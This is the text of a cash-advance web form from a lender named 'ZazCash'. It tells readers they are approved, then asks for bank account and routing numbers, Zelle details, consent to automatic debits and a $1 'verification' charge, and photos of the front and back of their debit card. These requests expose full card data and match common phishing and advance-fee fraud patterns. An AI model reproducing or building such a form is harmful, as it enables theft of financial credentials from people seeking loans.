Banking module and contract signingCongratulations, if you are here it is because you were approved for a cash advance, the following information will be secure in our system. We will use the details of your debit card to do a small bank verification of $ 1 that will be reimbursed at the end of your cash advance, this is to know if your card is active and add it to our automatic system. Your bank details are required for us to send your approved money after verification.Name*FirstLastEmail address*Bank name*Account number*Repeat your account number*Routing number*Account type? *Savings accountChecking accountZip code*Do you want your money to be sent by Zelle or ACH?*Please selectACH (No Fee)Zelle (Fee $2.50)Zelle AccountFront photo of your debit card*Back photo of your debit card*zazcashagreement2023AAgreement*I have read and understood the contract provided by "ZazCash", I agree to follow the process and have my payments automatically debited from my debit card and an initial verification of $ 1, which will be refunded at the end of my cash advance. OUR RATES SendThis field should be left blank Banking Module and Contract Signing